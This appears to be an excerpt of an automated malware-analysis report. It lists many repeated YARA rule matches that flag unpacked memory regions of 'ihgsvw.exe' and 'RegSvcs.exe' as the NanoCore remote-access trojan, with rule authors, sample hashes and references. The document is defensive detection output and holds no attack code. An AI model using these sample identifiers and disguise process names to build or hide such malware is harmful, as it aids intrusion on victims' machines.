      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
